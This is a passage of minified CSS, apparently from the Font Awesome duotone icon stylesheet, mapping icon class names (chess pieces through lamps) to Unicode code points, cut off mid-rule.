.fad.fa-chess-knight:after{content:"\10f441"}.fad.fa-chess-knight-alt:after{content:"\10f442"}.fad.fa-chess-pawn:after{content:"\10f443"}.fad.fa-chess-pawn-alt:after{content:"\10f444"}.fad.fa-chess-queen:after{content:"\10f445"}.fad.fa-chess-queen-alt:after{content:"\10f446"}.fad.fa-chess-rook:after{content:"\10f447"}.fad.fa-chess-rook-alt:after{content:"\10f448"}.fad.fa-chevron-circle-down:after{content:"\10f13a"}.fad.fa-chevron-circle-left:after{content:"\10f137"}.fad.fa-chevron-circle-right:after{content:"\10f138"}.fad.fa-chevron-circle-up:after{content:"\10f139"}.fad.fa-chevron-double-down:after{content:"\10f322"}.fad.fa-chevron-double-left:after{content:"\10f323"}.fad.fa-chevron-double-right:after{content:"\10f324"}.fad.fa-chevron-double-up:after{content:"\10f325"}.fad.fa-chevron-down:after{content:"\10f078"}.fad.fa-chevron-left:after{content:"\10f053"}.fad.fa-chevron-right:after{content:"\10f054"}.fad.fa-chevron-square-down:after{content:"\10f329"}.fad.fa-chevron-square-left:after{content:"\10f32a"}.fad.fa-chevron-square-right:after{content:"\10f32b"}.fad.fa-chevron-square-up:after{content:"\10f32c"}.fad.fa-chevron-up:after{content:"\10f077"}.fad.fa-child:after{content:"\10f1ae"}.fad.fa-chimney:after{content:"\10f78b"}.fad.fa-church:after{content:"\10f51d"}.fad.fa-circle:after{content:"\10f111"}.fad.fa-circle-notch:after{content:"\10f1ce"}.fad.fa-city:after{content:"\10f64f"}.fad.fa-clarinet:after{content:"\10f8ad"}.fad.fa-claw-marks:after{content:"\10f6c2"}.fad.fa-clinic-medical:after{content:"\10f7f2"}.fad.fa-clipboard:after{content:"\10f328"}.fad.fa-clipboard-check:after{content:"\10f46c"}.fad.fa-clipboard-list:after{content:"\10f46d"}.fad.fa-clipboard-list-check:after{content:"\10f737"}.fad.fa-clipboard-prescription:after{content:"\10f5e8"}.fad.fa-clipboard-user:after{content:"\10f7f3"}.fad.fa-clock:after{content:"\10f017"}.fad.fa-clone:after{content:"\10f24d"}.fad.fa-closed-captioning:after{content:"\10f20a"}.fad.fa-cloud:after{content:"\10f0c2"}.fad.fa-cloud-download:after{content:"\10f0ed"}.fad.fa-cloud-download-alt:after{content:"\10f381"}.fad.fa-cloud-drizzle:after{content:"\10f738"}.fad.fa-cloud-hail:after{content:"\10f739"}.fad.fa-cloud-hail-mixed:after{content:"\10f73a"}.fad.fa-cloud-meatball:after{content:"\10f73b"}.fad.fa-cloud-moon:after{content:"\10f6c3"}.fad.fa-cloud-moon-rain:after{content:"\10f73c"}.fad.fa-cloud-music:after{content:"\10f8ae"}.fad.fa-cloud-rain:after{content:"\10f73d"}.fad.fa-cloud-rainbow:after{content:"\10f73e"}.fad.fa-cloud-showers:after{content:"\10f73f"}.fad.fa-cloud-showers-heavy:after{content:"\10f740"}.fad.fa-cloud-sleet:after{content:"\10f741"}.fad.fa-cloud-snow:after{content:"\10f742"}.fad.fa-cloud-sun:after{content:"\10f6c4"}.fad.fa-cloud-sun-rain:after{content:"\10f743"}.fad.fa-cloud-upload:after{content:"\10f0ee"}.fad.fa-cloud-upload-alt:after{content:"\10f382"}.fad.fa-clouds:after{content:"\10f744"}.fad.fa-clouds-moon:after{content:"\10f745"}.fad.fa-clouds-sun:after{content:"\10f746"}.fad.fa-club:after{content:"\10f327"}.fad.fa-cocktail:after{content:"\10f561"}.fad.fa-code:after{content:"\10f121"}.fad.fa-code-branch:after{content:"\10f126"}.fad.fa-code-commit:after{content:"\10f386"}.fad.fa-code-merge:after{content:"\10f387"}.fad.fa-coffee:after{content:"\10f0f4"}.fad.fa-coffee-pot:after{content:"\10e002"}.fad.fa-coffee-togo:after{content:"\10f6c5"}.fad.fa-coffin:after{content:"\10f6c6"}.fad.fa-coffin-cross:after{content:"\10e051"}.fad.fa-cog:after{content:"\10f013"}.fad.fa-cogs:after{content:"\10f085"}.fad.fa-coin:after{content:"\10f85c"}.fad.fa-coins:after{content:"\10f51e"}.fad.fa-columns:after{content:"\10f0db"}.fad.fa-comet:after{content:"\10e003"}.fad.fa-comment:after{content:"\10f075"}.fad.fa-comment-alt:after{content:"\10f27a"}.fad.fa-comment-alt-check:after{content:"\10f4a2"}.fad.fa-comment-alt-dollar:after{content:"\10f650"}.fad.fa-comment-alt-dots:after{content:"\10f4a3"}.fad.fa-comment-alt-edit:after{content:"\10f4a4"}.fad.fa-comment-alt-exclamation:after{content:"\10f4a5"}.fad.fa-comment-alt-lines:after{content:"\10f4a6"}.fad.fa-comment-alt-medical:after{content:"\10f7f4"}.fad.fa-comment-alt-minus:after{content:"\10f4a7"}.fad.fa-comment-alt-music:after{content:"\10f8af"}.fad.fa-comment-alt-plus:after{content:"\10f4a8"}.fad.fa-comment-alt-slash:after{content:"\10f4a9"}.fad.fa-comment-alt-smile:after{content:"\10f4aa"}.fad.fa-comment-alt-times:after{content:"\10f4ab"}.fad.fa-comment-check:after{content:"\10f4ac"}.fad.fa-comment-dollar:after{content:"\10f651"}.fad.fa-comment-dots:after{content:"\10f4ad"}.fad.fa-comment-edit:after{content:"\10f4ae"}.fad.fa-comment-exclamation:after{content:"\10f4af"}.fad.fa-comment-lines:after{content:"\10f4b0"}.fad.fa-comment-medical:after{content:"\10f7f5"}.fad.fa-comment-minus:after{content:"\10f4b1"}.fad.fa-comment-music:after{content:"\10f8b0"}.fad.fa-comment-plus:after{content:"\10f4b2"}.fad.fa-comment-slash:after{content:"\10f4b3"}.fad.fa-comment-smile:after{content:"\10f4b4"}.fad.fa-comment-times:after{content:"\10f4b5"}.fad.fa-comments:after{content:"\10f086"}.fad.fa-comments-alt:after{content:"\10f4b6"}.fad.fa-comments-alt-dollar:after{content:"\10f652"}.fad.fa-comments-dollar:after{content:"\10f653"}.fad.fa-compact-disc:after{content:"\10f51f"}.fad.fa-compass:after{content:"\10f14e"}.fad.fa-compass-slash:after{content:"\10f5e9"}.fad.fa-compress:after{content:"\10f066"}.fad.fa-compress-alt:after{content:"\10f422"}.fad.fa-compress-arrows-alt:after{content:"\10f78c"}.fad.fa-compress-wide:after{content:"\10f326"}.fad.fa-computer-classic:after{content:"\10f8b1"}.fad.fa-computer-speaker:after{content:"\10f8b2"}.fad.fa-concierge-bell:after{content:"\10f562"}.fad.fa-construction:after{content:"\10f85d"}.fad.fa-container-storage:after{content:"\10f4b7"}.fad.fa-conveyor-belt:after{content:"\10f46e"}.fad.fa-conveyor-belt-alt:after{content:"\10f46f"}.fad.fa-cookie:after{content:"\10f563"}.fad.fa-cookie-bite:after{content:"\10f564"}.fad.fa-copy:after{content:"\10f0c5"}.fad.fa-copyright:after{content:"\10f1f9"}.fad.fa-corn:after{content:"\10f6c7"}.fad.fa-couch:after{content:"\10f4b8"}.fad.fa-cow:after{content:"\10f6c8"}.fad.fa-cowbell:after{content:"\10f8b3"}.fad.fa-cowbell-more:after{content:"\10f8b4"}.fad.fa-credit-card:after{content:"\10f09d"}.fad.fa-credit-card-blank:after{content:"\10f389"}.fad.fa-credit-card-front:after{content:"\10f38a"}.fad.fa-cricket:after{content:"\10f449"}.fad.fa-croissant:after{content:"\10f7f6"}.fad.fa-crop:after{content:"\10f125"}.fad.fa-crop-alt:after{content:"\10f565"}.fad.fa-cross:after{content:"\10f654"}.fad.fa-crosshairs:after{content:"\10f05b"}.fad.fa-crow:after{content:"\10f520"}.fad.fa-crown:after{content:"\10f521"}.fad.fa-crutch:after{content:"\10f7f7"}.fad.fa-crutches:after{content:"\10f7f8"}.fad.fa-cube:after{content:"\10f1b2"}.fad.fa-cubes:after{content:"\10f1b3"}.fad.fa-curling:after{content:"\10f44a"}.fad.fa-cut:after{content:"\10f0c4"}.fad.fa-dagger:after{content:"\10f6cb"}.fad.fa-database:after{content:"\10f1c0"}.fad.fa-deaf:after{content:"\10f2a4"}.fad.fa-debug:after{content:"\10f7f9"}.fad.fa-deer:after{content:"\10f78e"}.fad.fa-deer-rudolph:after{content:"\10f78f"}.fad.fa-democrat:after{content:"\10f747"}.fad.fa-desktop:after{content:"\10f108"}.fad.fa-desktop-alt:after{content:"\10f390"}.fad.fa-dewpoint:after{content:"\10f748"}.fad.fa-dharmachakra:after{content:"\10f655"}.fad.fa-diagnoses:after{content:"\10f470"}.fad.fa-diamond:after{content:"\10f219"}.fad.fa-dice:after{content:"\10f522"}.fad.fa-dice-d10:after{content:"\10f6cd"}.fad.fa-dice-d12:after{content:"\10f6ce"}.fad.fa-dice-d20:after{content:"\10f6cf"}.fad.fa-dice-d4:after{content:"\10f6d0"}.fad.fa-dice-d6:after{content:"\10f6d1"}.fad.fa-dice-d8:after{content:"\10f6d2"}.fad.fa-dice-five:after{content:"\10f523"}.fad.fa-dice-four:after{content:"\10f524"}.fad.fa-dice-one:after{content:"\10f525"}.fad.fa-dice-six:after{content:"\10f526"}.fad.fa-dice-three:after{content:"\10f527"}.fad.fa-dice-two:after{content:"\10f528"}.fad.fa-digging:after{content:"\10f85e"}.fad.fa-digital-tachograph:after{content:"\10f566"}.fad.fa-diploma:after{content:"\10f5ea"}.fad.fa-directions:after{content:"\10f5eb"}.fad.fa-disc-drive:after{content:"\10f8b5"}.fad.fa-disease:after{content:"\10f7fa"}.fad.fa-divide:after{content:"\10f529"}.fad.fa-dizzy:after{content:"\10f567"}.fad.fa-dna:after{content:"\10f471"}.fad.fa-do-not-enter:after{content:"\10f5ec"}.fad.fa-dog:after{content:"\10f6d3"}.fad.fa-dog-leashed:after{content:"\10f6d4"}.fad.fa-dollar-sign:after{content:"\10f155"}.fad.fa-dolly:after{content:"\10f472"}.fad.fa-dolly-empty:after{content:"\10f473"}.fad.fa-dolly-flatbed:after{content:"\10f474"}.fad.fa-dolly-flatbed-alt:after{content:"\10f475"}.fad.fa-dolly-flatbed-empty:after{content:"\10f476"}.fad.fa-donate:after{content:"\10f4b9"}.fad.fa-door-closed:after{content:"\10f52a"}.fad.fa-door-open:after{content:"\10f52b"}.fad.fa-dot-circle:after{content:"\10f192"}.fad.fa-dove:after{content:"\10f4ba"}.fad.fa-download:after{content:"\10f019"}.fad.fa-drafting-compass:after{content:"\10f568"}.fad.fa-dragon:after{content:"\10f6d5"}.fad.fa-draw-circle:after{content:"\10f5ed"}.fad.fa-draw-polygon:after{content:"\10f5ee"}.fad.fa-draw-square:after{content:"\10f5ef"}.fad.fa-dreidel:after{content:"\10f792"}.fad.fa-drone:after{content:"\10f85f"}.fad.fa-drone-alt:after{content:"\10f860"}.fad.fa-drum:after{content:"\10f569"}.fad.fa-drum-steelpan:after{content:"\10f56a"}.fad.fa-drumstick:after{content:"\10f6d6"}.fad.fa-drumstick-bite:after{content:"\10f6d7"}.fad.fa-dryer:after{content:"\10f861"}.fad.fa-dryer-alt:after{content:"\10f862"}.fad.fa-duck:after{content:"\10f6d8"}.fad.fa-dumbbell:after{content:"\10f44b"}.fad.fa-dumpster:after{content:"\10f793"}.fad.fa-dumpster-fire:after{content:"\10f794"}.fad.fa-dungeon:after{content:"\10f6d9"}.fad.fa-ear:after{content:"\10f5f0"}.fad.fa-ear-muffs:after{content:"\10f795"}.fad.fa-eclipse:after{content:"\10f749"}.fad.fa-eclipse-alt:after{content:"\10f74a"}.fad.fa-edit:after{content:"\10f044"}.fad.fa-egg:after{content:"\10f7fb"}.fad.fa-egg-fried:after{content:"\10f7fc"}.fad.fa-eject:after{content:"\10f052"}.fad.fa-elephant:after{content:"\10f6da"}.fad.fa-ellipsis-h:after{content:"\10f141"}.fad.fa-ellipsis-h-alt:after{content:"\10f39b"}.fad.fa-ellipsis-v:after{content:"\10f142"}.fad.fa-ellipsis-v-alt:after{content:"\10f39c"}.fad.fa-empty-set:after{content:"\10f656"}.fad.fa-engine-warning:after{content:"\10f5f2"}.fad.fa-envelope:after{content:"\10f0e0"}.fad.fa-envelope-open:after{content:"\10f2b6"}.fad.fa-envelope-open-dollar:after{content:"\10f657"}.fad.fa-envelope-open-text:after{content:"\10f658"}.fad.fa-envelope-square:after{content:"\10f199"}.fad.fa-equals:after{content:"\10f52c"}.fad.fa-eraser:after{content:"\10f12d"}.fad.fa-ethernet:after{content:"\10f796"}.fad.fa-euro-sign:after{content:"\10f153"}.fad.fa-exchange:after{content:"\10f0ec"}.fad.fa-exchange-alt:after{content:"\10f362"}.fad.fa-exclamation:after{content:"\10f12a"}.fad.fa-exclamation-circle:after{content:"\10f06a"}.fad.fa-exclamation-square:after{content:"\10f321"}.fad.fa-exclamation-triangle:after{content:"\10f071"}.fad.fa-expand:after{content:"\10f065"}.fad.fa-expand-alt:after{content:"\10f424"}.fad.fa-expand-arrows:after{content:"\10f31d"}.fad.fa-expand-arrows-alt:after{content:"\10f31e"}.fad.fa-expand-wide:after{content:"\10f320"}.fad.fa-external-link:after{content:"\10f08e"}.fad.fa-external-link-alt:after{content:"\10f35d"}.fad.fa-external-link-square:after{content:"\10f14c"}.fad.fa-external-link-square-alt:after{content:"\10f360"}.fad.fa-eye:after{content:"\10f06e"}.fad.fa-eye-dropper:after{content:"\10f1fb"}.fad.fa-eye-evil:after{content:"\10f6db"}.fad.fa-eye-slash:after{content:"\10f070"}.fad.fa-fan:after{content:"\10f863"}.fad.fa-fan-table:after{content:"\10e004"}.fad.fa-farm:after{content:"\10f864"}.fad.fa-fast-backward:after{content:"\10f049"}.fad.fa-fast-forward:after{content:"\10f050"}.fad.fa-faucet:after{content:"\10e005"}.fad.fa-faucet-drip:after{content:"\10e006"}.fad.fa-fax:after{content:"\10f1ac"}.fad.fa-feather:after{content:"\10f52d"}.fad.fa-feather-alt:after{content:"\10f56b"}.fad.fa-female:after{content:"\10f182"}.fad.fa-field-hockey:after{content:"\10f44c"}.fad.fa-fighter-jet:after{content:"\10f0fb"}.fad.fa-file:after{content:"\10f15b"}.fad.fa-file-alt:after{content:"\10f15c"}.fad.fa-file-archive:after{content:"\10f1c6"}.fad.fa-file-audio:after{content:"\10f1c7"}.fad.fa-file-certificate:after{content:"\10f5f3"}.fad.fa-file-chart-line:after{content:"\10f659"}.fad.fa-file-chart-pie:after{content:"\10f65a"}.fad.fa-file-check:after{content:"\10f316"}.fad.fa-file-code:after{content:"\10f1c9"}.fad.fa-file-contract:after{content:"\10f56c"}.fad.fa-file-csv:after{content:"\10f6dd"}.fad.fa-file-download:after{content:"\10f56d"}.fad.fa-file-edit:after{content:"\10f31c"}.fad.fa-file-excel:after{content:"\10f1c3"}.fad.fa-file-exclamation:after{content:"\10f31a"}.fad.fa-file-export:after{content:"\10f56e"}.fad.fa-file-image:after{content:"\10f1c5"}.fad.fa-file-import:after{content:"\10f56f"}.fad.fa-file-invoice:after{content:"\10f570"}.fad.fa-file-invoice-dollar:after{content:"\10f571"}.fad.fa-file-medical:after{content:"\10f477"}.fad.fa-file-medical-alt:after{content:"\10f478"}.fad.fa-file-minus:after{content:"\10f318"}.fad.fa-file-music:after{content:"\10f8b6"}.fad.fa-file-pdf:after{content:"\10f1c1"}.fad.fa-file-plus:after{content:"\10f319"}.fad.fa-file-powerpoint:after{content:"\10f1c4"}.fad.fa-file-prescription:after{content:"\10f572"}.fad.fa-file-search:after{content:"\10f865"}.fad.fa-file-signature:after{content:"\10f573"}.fad.fa-file-spreadsheet:after{content:"\10f65b"}.fad.fa-file-times:after{content:"\10f317"}.fad.fa-file-upload:after{content:"\10f574"}.fad.fa-file-user:after{content:"\10f65c"}.fad.fa-file-video:after{content:"\10f1c8"}.fad.fa-file-word:after{content:"\10f1c2"}.fad.fa-files-medical:after{content:"\10f7fd"}.fad.fa-fill:after{content:"\10f575"}.fad.fa-fill-drip:after{content:"\10f576"}.fad.fa-film:after{content:"\10f008"}.fad.fa-film-alt:after{content:"\10f3a0"}.fad.fa-film-canister:after{content:"\10f8b7"}.fad.fa-filter:after{content:"\10f0b0"}.fad.fa-fingerprint:after{content:"\10f577"}.fad.fa-fire:after{content:"\10f06d"}.fad.fa-fire-alt:after{content:"\10f7e4"}.fad.fa-fire-extinguisher:after{content:"\10f134"}.fad.fa-fire-smoke:after{content:"\10f74b"}.fad.fa-fireplace:after{content:"\10f79a"}.fad.fa-first-aid:after{content:"\10f479"}.fad.fa-fish:after{content:"\10f578"}.fad.fa-fish-cooked:after{content:"\10f7fe"}.fad.fa-fist-raised:after{content:"\10f6de"}.fad.fa-flag:after{content:"\10f024"}.fad.fa-flag-alt:after{content:"\10f74c"}.fad.fa-flag-checkered:after{content:"\10f11e"}.fad.fa-flag-usa:after{content:"\10f74d"}.fad.fa-flame:after{content:"\10f6df"}.fad.fa-flashlight:after{content:"\10f8b8"}.fad.fa-flask:after{content:"\10f0c3"}.fad.fa-flask-poison:after{content:"\10f6e0"}.fad.fa-flask-potion:after{content:"\10f6e1"}.fad.fa-flower:after{content:"\10f7ff"}.fad.fa-flower-daffodil:after{content:"\10f800"}.fad.fa-flower-tulip:after{content:"\10f801"}.fad.fa-flushed:after{content:"\10f579"}.fad.fa-flute:after{content:"\10f8b9"}.fad.fa-flux-capacitor:after{content:"\10f8ba"}.fad.fa-fog:after{content:"\10f74e"}.fad.fa-folder:after{content:"\10f07b"}.fad.fa-folder-download:after{content:"\10e053"}.fad.fa-folder-minus:after{content:"\10f65d"}.fad.fa-folder-open:after{content:"\10f07c"}.fad.fa-folder-plus:after{content:"\10f65e"}.fad.fa-folder-times:after{content:"\10f65f"}.fad.fa-folder-tree:after{content:"\10f802"}.fad.fa-folder-upload:after{content:"\10e054"}.fad.fa-folders:after{content:"\10f660"}.fad.fa-font:after{content:"\10f031"}.fad.fa-font-awesome-logo-full:after{content:"\10f4e6"}.fad.fa-font-case:after{content:"\10f866"}.fad.fa-football-ball:after{content:"\10f44e"}.fad.fa-football-helmet:after{content:"\10f44f"}.fad.fa-forklift:after{content:"\10f47a"}.fad.fa-forward:after{content:"\10f04e"}.fad.fa-fragile:after{content:"\10f4bb"}.fad.fa-french-fries:after{content:"\10f803"}.fad.fa-frog:after{content:"\10f52e"}.fad.fa-frosty-head:after{content:"\10f79b"}.fad.fa-frown:after{content:"\10f119"}.fad.fa-frown-open:after{content:"\10f57a"}.fad.fa-function:after{content:"\10f661"}.fad.fa-funnel-dollar:after{content:"\10f662"}.fad.fa-futbol:after{content:"\10f1e3"}.fad.fa-galaxy:after{content:"\10e008"}.fad.fa-game-board:after{content:"\10f867"}.fad.fa-game-board-alt:after{content:"\10f868"}.fad.fa-game-console-handheld:after{content:"\10f8bb"}.fad.fa-gamepad:after{content:"\10f11b"}.fad.fa-gamepad-alt:after{content:"\10f8bc"}.fad.fa-garage:after{content:"\10e009"}.fad.fa-garage-car:after{content:"\10e00a"}.fad.fa-garage-open:after{content:"\10e00b"}.fad.fa-gas-pump:after{content:"\10f52f"}.fad.fa-gas-pump-slash:after{content:"\10f5f4"}.fad.fa-gavel:after{content:"\10f0e3"}.fad.fa-gem:after{content:"\10f3a5"}.fad.fa-genderless:after{content:"\10f22d"}.fad.fa-ghost:after{content:"\10f6e2"}.fad.fa-gift:after{content:"\10f06b"}.fad.fa-gift-card:after{content:"\10f663"}.fad.fa-gifts:after{content:"\10f79c"}.fad.fa-gingerbread-man:after{content:"\10f79d"}.fad.fa-glass:after{content:"\10f804"}.fad.fa-glass-champagne:after{content:"\10f79e"}.fad.fa-glass-cheers:after{content:"\10f79f"}.fad.fa-glass-citrus:after{content:"\10f869"}.fad.fa-glass-martini:after{content:"\10f000"}.fad.fa-glass-martini-alt:after{content:"\10f57b"}.fad.fa-glass-whiskey:after{content:"\10f7a0"}.fad.fa-glass-whiskey-rocks:after{content:"\10f7a1"}.fad.fa-glasses:after{content:"\10f530"}.fad.fa-glasses-alt:after{content:"\10f5f5"}.fad.fa-globe:after{content:"\10f0ac"}.fad.fa-globe-africa:after{content:"\10f57c"}.fad.fa-globe-americas:after{content:"\10f57d"}.fad.fa-globe-asia:after{content:"\10f57e"}.fad.fa-globe-europe:after{content:"\10f7a2"}.fad.fa-globe-snow:after{content:"\10f7a3"}.fad.fa-globe-stand:after{content:"\10f5f6"}.fad.fa-golf-ball:after{content:"\10f450"}.fad.fa-golf-club:after{content:"\10f451"}.fad.fa-gopuram:after{content:"\10f664"}.fad.fa-graduation-cap:after{content:"\10f19d"}.fad.fa-gramophone:after{content:"\10f8bd"}.fad.fa-greater-than:after{content:"\10f531"}.fad.fa-greater-than-equal:after{content:"\10f532"}.fad.fa-grimace:after{content:"\10f57f"}.fad.fa-grin:after{content:"\10f580"}.fad.fa-grin-alt:after{content:"\10f581"}.fad.fa-grin-beam:after{content:"\10f582"}.fad.fa-grin-beam-sweat:after{content:"\10f583"}.fad.fa-grin-hearts:after{content:"\10f584"}.fad.fa-grin-squint:after{content:"\10f585"}.fad.fa-grin-squint-tears:after{content:"\10f586"}.fad.fa-grin-stars:after{content:"\10f587"}.fad.fa-grin-tears:after{content:"\10f588"}.fad.fa-grin-tongue:after{content:"\10f589"}.fad.fa-grin-tongue-squint:after{content:"\10f58a"}.fad.fa-grin-tongue-wink:after{content:"\10f58b"}.fad.fa-grin-wink:after{content:"\10f58c"}.fad.fa-grip-horizontal:after{content:"\10f58d"}.fad.fa-grip-lines:after{content:"\10f7a4"}.fad.fa-grip-lines-vertical:after{content:"\10f7a5"}.fad.fa-grip-vertical:after{content:"\10f58e"}.fad.fa-guitar:after{content:"\10f7a6"}.fad.fa-guitar-electric:after{content:"\10f8be"}.fad.fa-guitars:after{content:"\10f8bf"}.fad.fa-h-square:after{content:"\10f0fd"}.fad.fa-h1:after{content:"\10f313"}.fad.fa-h2:after{content:"\10f314"}.fad.fa-h3:after{content:"\10f315"}.fad.fa-h4:after{content:"\10f86a"}.fad.fa-hamburger:after{content:"\10f805"}.fad.fa-hammer:after{content:"\10f6e3"}.fad.fa-hammer-war:after{content:"\10f6e4"}.fad.fa-hamsa:after{content:"\10f665"}.fad.fa-hand-heart:after{content:"\10f4bc"}.fad.fa-hand-holding:after{content:"\10f4bd"}.fad.fa-hand-holding-box:after{content:"\10f47b"}.fad.fa-hand-holding-heart:after{content:"\10f4be"}.fad.fa-hand-holding-magic:after{content:"\10f6e5"}.fad.fa-hand-holding-medical:after{content:"\10e05c"}.fad.fa-hand-holding-seedling:after{content:"\10f4bf"}.fad.fa-hand-holding-usd:after{content:"\10f4c0"}.fad.fa-hand-holding-water:after{content:"\10f4c1"}.fad.fa-hand-lizard:after{content:"\10f258"}.fad.fa-hand-middle-finger:after{content:"\10f806"}.fad.fa-hand-paper:after{content:"\10f256"}.fad.fa-hand-peace:after{content:"\10f25b"}.fad.fa-hand-point-down:after{content:"\10f0a7"}.fad.fa-hand-point-left:after{content:"\10f0a5"}.fad.fa-hand-point-right:after{content:"\10f0a4"}.fad.fa-hand-point-up:after{content:"\10f0a6"}.fad.fa-hand-pointer:after{content:"\10f25a"}.fad.fa-hand-receiving:after{content:"\10f47c"}.fad.fa-hand-rock:after{content:"\10f255"}.fad.fa-hand-scissors:after{content:"\10f257"}.fad.fa-hand-sparkles:after{content:"\10e05d"}.fad.fa-hand-spock:after{content:"\10f259"}.fad.fa-hands:after{content:"\10f4c2"}.fad.fa-hands-heart:after{content:"\10f4c3"}.fad.fa-hands-helping:after{content:"\10f4c4"}.fad.fa-hands-usd:after{content:"\10f4c5"}.fad.fa-hands-wash:after{content:"\10e05e"}.fad.fa-handshake:after{content:"\10f2b5"}.fad.fa-handshake-alt:after{content:"\10f4c6"}.fad.fa-handshake-alt-slash:after{content:"\10e05f"}.fad.fa-handshake-slash:after{content:"\10e060"}.fad.fa-hanukiah:after{content:"\10f6e6"}.fad.fa-hard-hat:after{content:"\10f807"}.fad.fa-hashtag:after{content:"\10f292"}.fad.fa-hat-chef:after{content:"\10f86b"}.fad.fa-hat-cowboy:after{content:"\10f8c0"}.fad.fa-hat-cowboy-side:after{content:"\10f8c1"}.fad.fa-hat-santa:after{content:"\10f7a7"}.fad.fa-hat-winter:after{content:"\10f7a8"}.fad.fa-hat-witch:after{content:"\10f6e7"}.fad.fa-hat-wizard:after{content:"\10f6e8"}.fad.fa-hdd:after{content:"\10f0a0"}.fad.fa-head-side:after{content:"\10f6e9"}.fad.fa-head-side-brain:after{content:"\10f808"}.fad.fa-head-side-cough:after{content:"\10e061"}.fad.fa-head-side-cough-slash:after{content:"\10e062"}.fad.fa-head-side-headphones:after{content:"\10f8c2"}.fad.fa-head-side-mask:after{content:"\10e063"}.fad.fa-head-side-medical:after{content:"\10f809"}.fad.fa-head-side-virus:after{content:"\10e064"}.fad.fa-head-vr:after{content:"\10f6ea"}.fad.fa-heading:after{content:"\10f1dc"}.fad.fa-headphones:after{content:"\10f025"}.fad.fa-headphones-alt:after{content:"\10f58f"}.fad.fa-headset:after{content:"\10f590"}.fad.fa-heart:after{content:"\10f004"}.fad.fa-heart-broken:after{content:"\10f7a9"}.fad.fa-heart-circle:after{content:"\10f4c7"}.fad.fa-heart-rate:after{content:"\10f5f8"}.fad.fa-heart-square:after{content:"\10f4c8"}.fad.fa-heartbeat:after{content:"\10f21e"}.fad.fa-heat:after{content:"\10e00c"}.fad.fa-helicopter:after{content:"\10f533"}.fad.fa-helmet-battle:after{content:"\10f6eb"}.fad.fa-hexagon:after{content:"\10f312"}.fad.fa-highlighter:after{content:"\10f591"}.fad.fa-hiking:after{content:"\10f6ec"}.fad.fa-hippo:after{content:"\10f6ed"}.fad.fa-history:after{content:"\10f1da"}.fad.fa-hockey-mask:after{content:"\10f6ee"}.fad.fa-hockey-puck:after{content:"\10f453"}.fad.fa-hockey-sticks:after{content:"\10f454"}.fad.fa-holly-berry:after{content:"\10f7aa"}.fad.fa-home:after{content:"\10f015"}.fad.fa-home-alt:after{content:"\10f80a"}.fad.fa-home-heart:after{content:"\10f4c9"}.fad.fa-home-lg:after{content:"\10f80b"}.fad.fa-home-lg-alt:after{content:"\10f80c"}.fad.fa-hood-cloak:after{content:"\10f6ef"}.fad.fa-horizontal-rule:after{content:"\10f86c"}.fad.fa-horse:after{content:"\10f6f0"}.fad.fa-horse-head:after{content:"\10f7ab"}.fad.fa-horse-saddle:after{content:"\10f8c3"}.fad.fa-hospital:after{content:"\10f0f8"}.fad.fa-hospital-alt:after{content:"\10f47d"}.fad.fa-hospital-symbol:after{content:"\10f47e"}.fad.fa-hospital-user:after{content:"\10f80d"}.fad.fa-hospitals:after{content:"\10f80e"}.fad.fa-hot-tub:after{content:"\10f593"}.fad.fa-hotdog:after{content:"\10f80f"}.fad.fa-hotel:after{content:"\10f594"}.fad.fa-hourglass:after{content:"\10f254"}.fad.fa-hourglass-end:after{content:"\10f253"}.fad.fa-hourglass-half:after{content:"\10f252"}.fad.fa-hourglass-start:after{content:"\10f251"}.fad.fa-house:after{content:"\10e00d"}.fad.fa-house-damage:after{content:"\10f6f1"}.fad.fa-house-day:after{content:"\10e00e"}.fad.fa-house-flood:after{content:"\10f74f"}.fad.fa-house-leave:after{content:"\10e00f"}.fad.fa-house-night:after{content:"\10e010"}.fad.fa-house-return:after{content:"\10e011"}.fad.fa-house-signal:after{content:"\10e012"}.fad.fa-house-user:after{content:"\10e065"}.fad.fa-hryvnia:after{content:"\10f6f2"}.fad.fa-humidity:after{content:"\10f750"}.fad.fa-hurricane:after{content:"\10f751"}.fad.fa-i-cursor:after{content:"\10f246"}.fad.fa-ice-cream:after{content:"\10f810"}.fad.fa-ice-skate:after{content:"\10f7ac"}.fad.fa-icicles:after{content:"\10f7ad"}.fad.fa-icons:after{content:"\10f86d"}.fad.fa-icons-alt:after{content:"\10f86e"}.fad.fa-id-badge:after{content:"\10f2c1"}.fad.fa-id-card:after{content:"\10f2c2"}.fad.fa-id-card-alt:after{content:"\10f47f"}.fad.fa-igloo:after{content:"\10f7ae"}.fad.fa-image:after{content:"\10f03e"}.fad.fa-image-polaroid:after{content:"\10f8c4"}.fad.fa-images:after{content:"\10f302"}.fad.fa-inbox:after{content:"\10f01c"}.fad.fa-inbox-in:after{content:"\10f310"}.fad.fa-inbox-out:after{content:"\10f311"}.fad.fa-indent:after{content:"\10f03c"}.fad.fa-industry:after{content:"\10f275"}.fad.fa-industry-alt:after{content:"\10f3b3"}.fad.fa-infinity:after{content:"\10f534"}.fad.fa-info:after{content:"\10f129"}.fad.fa-info-circle:after{content:"\10f05a"}.fad.fa-info-square:after{content:"\10f30f"}.fad.fa-inhaler:after{content:"\10f5f9"}.fad.fa-integral:after{content:"\10f667"}.fad.fa-intersection:after{content:"\10f668"}.fad.fa-inventory:after{content:"\10f480"}.fad.fa-island-tropical:after{content:"\10f811"}.fad.fa-italic:after{content:"\10f033"}.fad.fa-jack-o-lantern:after{content:"\10f30e"}.fad.fa-jedi:after{content:"\10f669"}.fad.fa-joint:after{content:"\10f595"}.fad.fa-journal-whills:after{content:"\10f66a"}.fad.fa-joystick:after{content:"\10f8c5"}.fad.fa-jug:after{content:"\10f8c6"}.fad.fa-kaaba:after{content:"\10f66b"}.fad.fa-kazoo:after{content:"\10f8c7"}.fad.fa-kerning:after{content:"\10f86f"}.fad.fa-key:after{content:"\10f084"}.fad.fa-key-skeleton:after{content:"\10f6f3"}.fad.fa-keyboard:after{content:"\10f11c"}.fad.fa-keynote:after{content:"\10f66c"}.fad.fa-khanda:after{content:"\10f66d"}.fad.fa-kidneys:after{content:"\10f5fb"}.fad.fa-kiss:after{content:"\10f596"}.fad.fa-kiss-beam:after{content:"\10f597"}.fad.fa-kiss-wink-heart:after{content:"\10f598"}.fad.fa-kite:after{content:"\10f6f4"}.fad.fa-kiwi-bird:after{content:"\10f535"}.fad.fa-knife-kitchen:after{content:"\10f6f5"}.fad.fa-lambda:after{content:"\10f66e"}.fad.fa-lamp:after{content:"\10f4ca"}.fad.fa-lamp-desk:after{content:"\10e014"}.fad.fa-lamp-floor:after{content:"\10e015"}.fad.fa-landmark:after{content:"\10f66f"}.fad.f